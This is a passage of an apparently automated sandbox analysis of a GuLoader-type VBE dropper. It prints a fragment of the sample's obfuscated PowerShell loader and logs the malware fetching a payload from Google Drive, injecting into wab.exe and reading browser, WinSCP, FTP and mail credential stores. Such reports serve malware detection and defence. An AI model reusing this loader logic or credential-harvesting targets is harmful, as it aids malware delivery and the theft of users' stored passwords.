'humn,ogazhuikal,elbeada/p,5la.fr0ru he(a wpuicun udkuo .wsls l .n step li1 b0fy.p,0.y;i. .ewcaib,ns,6di4te;vi bx,o6e.4,i;no burulvgl:un1co2sy1d.. u0 n)sw igscev c.hkcyono/ c2ch0cu1tr0di0ko1dr0pe1li awf.ni drareorft.osixco/r 1 2re1 j.so0.a ';$dissers=immatrikulationens 'g u es ne .r,e-ida agemes,nsttso ';$redesignating=immatrikulationens ' rhaft ctbeps sku:va/ p/ .datrudif,vovesa. ugtaosko,eg ulsoeca.syc uo emve/,eubeckr?d,ecoxi,p ko ,r stin=,ediro .wk.n.el,rochagld.a&fristd.e=ac1n,t utax o3inpkagrov .qomo mu ayreud.nov0unpmovfifa.0s.s ,1prvchusao,eok.v,upv,zvace 7ar6phtud5 ';$bourre=immatrikulationens 's,>i ';$gnier111=immatrikulationens 'friske ix ';$hoodwinked='fiskeflaaderne';$parastades = immatrikulationens ' fegacf,h fo,r .l%k.a epalpspdjiaoutpeau,%,l\frbmoe ol ylatet rkiipacun7c.4 f.g,ab,f rsek fo&st&k, hecyc dhkloco u.t n ';influerende (immatrikulationens 'ti$exgallidohubbea klsa: .cdehjeahecspocun nn fegur us j1 s7a,2.v=be(caccammads si/tucex co$p.ptwasirdeas.s,ft aaaedreekospe),r ');influerende (immatrikulationens 'sn$s.g olcuofobtuanoll :krhkoybag .idiei,junnske uk oo amvemeksmii oo .nubedenudsw,= t$derjae.jd ee .sbiiingopn,sayat risonfeg t.c.s.vpb.lgei stun(fa$ ub o au.tr frbyep.) ');influerende (immatrikulationens ' t[ in ieurtps.p s,berer iv .iticreedupplo iiafno,tlims,alin ta hg mekordi]no:fi: spre,gcs,utir iunt,eyampbrrceo ettrouscstosvl e ,o= t i [anndreunt.k.f sdeewectuu .r.hi ,t,myatp.tr sohitfoom,cduo lunt.uy apsle r] l:s.: ,toflsmspa1un2 a ');$redesignating=$hygiejnekommsionens[0];$fangstbaaden190= (immatrikulationens 'am$,igunlhaoeqbkla.al,e:.lkcoosun ,sfoe rk mvteec,nl,thjeposos=.mnfieopws -w,o ab .jbleincdetca ths pyresanttee .mmu.epn kep.t a.s,wsoe,ebovc .lfaikbea.nlkt');$fangstbaaden190+=$chaconners172[1];influerende ($fangstbaaden190);influerende (immatrikulationens 'ar$tokfookvnovsk.edok,Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeCode function: 16_2_007E3675 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,16_2_007E3675
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: Yara matchFile source: 0000000F.00000002.882856308898.0000000020C85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 9032, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information11
            Scripting
            Valid Accounts121
            Windows Management Instrumentation
            11
            Scripting
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Exploitation for Client Execution
            1
            DLL Side-Loading
            111
            Process Injection
            1
            Deobfuscate/Decode Files or Information
            1
            Credentials in Registry
            1
            File and Directory Discovery
            Remote Desktop Protocol2
            Data from Local System
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts212
            Command and Scripting Interpreter
            1
            Registry Run Keys / Startup Folder
            1
            Registry Run Keys / Startup Folder
            1
            Obfuscated Files or Information
            Security Account Manager125
            System Information Discovery
            SMB/Windows Admin Shares1
            Email Collection
            2
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell
            Login HookLogin Hook1
            Software Packing
            NTDS1
            Query Registry
            Distributed Component Object ModelInput Capture13
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Timestomp
            LSA Secrets431
            Security Software Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain Credentials14
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Masquerading
            DCSync1
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job14
            Virtualization/Sandbox Evasion
            Proc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
            Process Injection
            /etc/passwd and /etc/shadow1
            System Network Configuration Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            Hidden Files and Directories
            Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
            Rundll32
            Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1466653 Sample: Inquiry Studbolt - 240703.vbe Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 38 ip-api.com 2->38 40 drive.usercontent.google.com 2->40 42 drive.google.com 2->42 50 Multi AV Scanner detection for domain / URL 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 Yara detected GuLoader 2->54 56 6 other signatures 2->56 9 wscript.exe 2->9         started        12 GrOcCQC.exe 3 1 2->12         started        14 GrOcCQC.exe 1 2->14         started        16 rundll32.exe 2->16         started        signatures3 process4 signatures5 70 Suspicious powershell command line found 9->70 72 Wscript starts Powershell (via cmd or directly) 9->72 74 Obfuscated command line found 9->74 76 3 other signatures 9->76 18 powershell.exe 14 19 9->18         started        process6 dnsIp7 44 drive.google.com 142.250.191.110, 443, 49949, 49951 GOOGLEUS United States 18->44 46 drive.usercontent.google.com 172.217.2.33, 443, 49950, 49952 GOOGLEUS United States 18->46 58 Suspicious powershell command line found 18->58 60 Obfuscated command line found 18->60 62 Very long command line found 18->62 64 Found suspicious powershell code related to unpacking or dynamic code loading 18->64 22 powershell.exe 17 18->22         started        25 conhost.exe 18->25         started        27 cmd.exe 1 18->27         started        signatures8 process9 signatures10 66 Writes to foreign memory regions 22->66 68 Found suspicious powershell code related to unpacking or dynamic code loading 22->68 29 wab.exe 15 10 22->29         started        34 cmd.exe 1 22->34         started        process11 dnsIp12 48 ip-api.com 208.95.112.1, 49953, 80 TUT-ASUS United States 29->48 36 C:\Users\user\AppData\Roaming\...behaviorgraphrOcCQC.exe, PE32 29->36 dropped 78 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 29->78 80 Tries to steal Mail credentials (via file / registry access) 29->80 82 Tries to harvest and steal ftp login credentials 29->82 84 2 other signatures 29->84 file13 signatures14

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Inquiry Studbolt - 240703.vbe5%VirustotalBrowse
            Inquiry Studbolt - 240703.vbe3%ReversingLabsWin32.Dropper.Generic
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe0%ReversingLabs
            No Antivirus matches
            SourceDetectionScannerLabelLink
            drive.google.com0%VirustotalBrowse
            drive.usercontent.google.com1%VirustotalBrowse
            ip-api.com0%VirustotalBrowse
            SourceDetectionScannerLabelLink
            https://drive.goog0%Avira URL Cloudsafe
            http://pesterbdd.com/images/Pester.png40%Avira URL Cloudsafe
            http://www.apache.org/licenses/LICENSE-2.00%Avira URL Cloudsafe
            http://pesterbdd.com/images/Pester.png0%Avira URL Cloudsafe
            http://nuget.org/NuGet.exe0%Avira URL Cloudsafe
            http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
            https://drive.google.com/uc?ex0%Avira URL Cloudsafe
            https://drive.google.com/u0%Avira URL Cloudsafe
            http://www.apache.org/licenses/LICENSE-2.00%VirustotalBrowse
            https://drive.goog1%VirustotalBrowse
            http://pesterbdd.com/images/Pester.png410%VirustotalBrowse
            https://go.micro0%Avira URL Cloudsafe
            https://drive.google.com/uc?ex2%VirustotalBrowse
            https://drive.google.com/u0%VirustotalBrowse
            http://pesterbdd.com/images/Pester.pngh0%Avira URL Cloudsafe
            http://nuget.org/NuGet.exe0%VirustotalBrowse
            https://contoso.com/License0%Avira URL Cloudsafe
            https://contoso.com/Icon0%Avira URL Cloudsafe
            https://drive.usercontent.google.com/0%Avira URL Cloudsafe
            http://pesterbdd.com/images/Pester.pngh12%VirustotalBrowse
            https://drive.google.0%Avira URL Cloudsafe
            http://www.apache.org/licenses/LICENSE-2.0.html40%Avira URL Cloudsafe
            https://drive.usercontent.google.com/1%VirustotalBrowse
            https://drive.go0%Avira URL Cloudsafe
            http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
            https://drive.google.0%VirustotalBrowse
            https://github.com/Pester/Pester0%Avira URL Cloudsafe
            https://contoso.com/Icon0%VirustotalBrowse
            https://contoso.com/License0%VirustotalBrowse
            http://www.apache.org/licenses/LICENSE-2.0.html40%VirustotalBrowse
            https://aka.ms/pscore6lB7q0%Avira URL Cloudsafe
            https://drive.goo0%Avira URL Cloudsafe
            https://www.google.com0%Avira URL Cloudsafe
            https://github.com/Pester/Pester1%VirustotalBrowse
            https://github.com/Pester/Pester40%Avira URL Cloudsafe
            https://drive.google.com/FP0%Avira URL Cloudsafe
            https://drive.g0%Avira URL Cloudsafe
            https://drive.goo0%VirustotalBrowse
            http://www.apache.org/licenses/LICENSE-2.0.htmlXz0%Avira URL Cloudsafe
            https://www.google.com0%VirustotalBrowse
            https://drive.google.com/uc0%Avira URL Cloudsafe
            https://github.com/Pester/Pester40%VirustotalBrowse
            http://crl.microso0%Avira URL Cloudsafe
            https://drive.google.com/0%Avira URL Cloudsafe
            http://www.apache.org/licenses/LICENSE-2.0.htmlXz0%VirustotalBrowse
            https://drive.googl0%Avira URL Cloudsafe
            https://drive.google.com/uc1%VirustotalBrowse
            https://drive.google.com/uc?e0%Avira URL Cloudsafe
            https://contoso.com/0%Avira URL Cloudsafe
            https://github.com/Pester/Pesterh0%Avira URL Cloudsafe
            https://drive.google.com/uc?e2%VirustotalBrowse
            https://drive.google.com/1%VirustotalBrowse
            http://pesterbdd.com/images/Pester.png9%VirustotalBrowse
            https://nuget.org/nuget.exe0%Avira URL Cloudsafe
            http://www.apache.org/licenses/LICENSE-2.0.htmlh0%Avira URL Cloudsafe
            https://drive.google.com0%Avira URL Cloudsafe
            https://github.com/Pester/Pesterh0%VirustotalBrowse
            http://ip-api.com0%Avira URL Cloudsafe
            https://drive.usercontent.google.com0%Avira URL Cloudsafe
            https://github.com/Pester/PesterXz0%Avira URL Cloudsafe
            https://drive.google.c0%Avira URL Cloudsafe
            https://nuget.org/nuget.exe0%VirustotalBrowse
            http://www.apache.org/licenses/LICENSE-2.0.htmlh0%VirustotalBrowse
            https://drive.usercontent.google.com1%VirustotalBrowse
            https://drive.google.com1%VirustotalBrowse
            https://aka.ms/pscore680%Avira URL Cloudsafe
            https://github.com/Pester/PesterXz0%VirustotalBrowse
            https://apis.google.com0%Avira URL Cloudsafe
            http://ip-api.com0%VirustotalBrowse
            https://drive.google.com/uc?0%Avira URL Cloudsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%Avira URL Cloudsafe
            https://oneget.org0%Avira URL Cloudsafe
            https://drive.google0%Avira URL Cloudsafe
            https://drive.google.co0%Avira URL Cloudsafe
            http://ip-api.com/line/?fields=hosting0%Avira URL Cloudsafe
            https://contoso.com/0%VirustotalBrowse
            http://pesterbdd.com/images/Pester.pngXz0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            142.250.191.110
            truefalseunknown
            drive.usercontent.google.com
            172.217.2.33
            truefalseunknown
            ip-api.com
            208.95.112.1
            truetrueunknown
            NameMaliciousAntivirus DetectionReputation
            http://ip-api.com/line/?fields=hostingfalse
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://pesterbdd.com/images/Pester.png4powershell.exe, 0000000D.00000002.878906475177.0000000004828000.00000004.00000800.00020000.00000000.sdmpfalse
            • 10%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://nuget.org/NuGet.exepowershell.exe, 00000009.00000002.882848532717.000002165B480000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882926973942.0000021669E6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878910754934.0000000005737000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878910754934.0000000005874000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000009.00000002.882848532717.000002165B100000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://drive.googpowershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.882848532717.000002165B300000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882848532717.000002165A028000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878906475177.0000000004828000.00000004.00000800.00020000.00000000.sdmpfalse
            • 9%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.882848532717.000002165B300000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882848532717.000002165A028000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878906475177.0000000004828000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://drive.google.com/uc?expowershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpfalse
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://drive.google.com/upowershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://go.micropowershell.exe, 00000009.00000002.882848532717.000002165C0DC000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://pesterbdd.com/images/Pester.pnghpowershell.exe, 00000009.00000002.882848532717.000002165B32B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882848532717.000002165B300000.00000004.00000800.00020000.00000000.sdmpfalse
            • 12%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://contoso.com/Licensepowershell.exe, 0000000D.00000002.878910754934.0000000005874000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://contoso.com/Iconpowershell.exe, 0000000D.00000002.878910754934.0000000005874000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://drive.usercontent.google.com/wab.exe, 0000000F.00000002.882847947414.0000000005102000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878864713619.0000000005134000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.880185049304.0000000005102000.00000004.00000020.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://drive.google.powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.apache.org/licenses/LICENSE-2.0.html4powershell.exe, 0000000D.00000002.878906475177.0000000004828000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://drive.gopowershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.882848532717.000002165B300000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882848532717.000002165A028000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878906475177.0000000004828000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://aka.ms/pscore6lB7qpowershell.exe, 0000000D.00000002.878906475177.00000000046D1000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://drive.goopowershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://www.google.compowershell.exe, 00000009.00000002.882848532717.000002165A2CD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878845630299.0000000005134000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://github.com/Pester/Pester4powershell.exe, 0000000D.00000002.878906475177.0000000004828000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://drive.google.com/FPwab.exe, 0000000F.00000002.882847947414.00000000050AE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.880185049304.00000000050AD000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://drive.gpowershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.apache.org/licenses/LICENSE-2.0.htmlXzpowershell.exe, 00000009.00000002.882848532717.000002165A028000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://drive.google.com/ucpowershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://crl.microsopowershell.exe, 0000000D.00000002.878917749751.0000000008716000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://drive.google.com/powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.882847947414.00000000050AE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.880185049304.00000000050AD000.00000004.00000020.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://drive.googlpowershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://drive.google.com/uc?epowershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmpfalse
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://contoso.com/powershell.exe, 0000000D.00000002.878910754934.0000000005874000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://github.com/Pester/Pesterhpowershell.exe, 00000009.00000002.882848532717.000002165B32B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882848532717.000002165B300000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
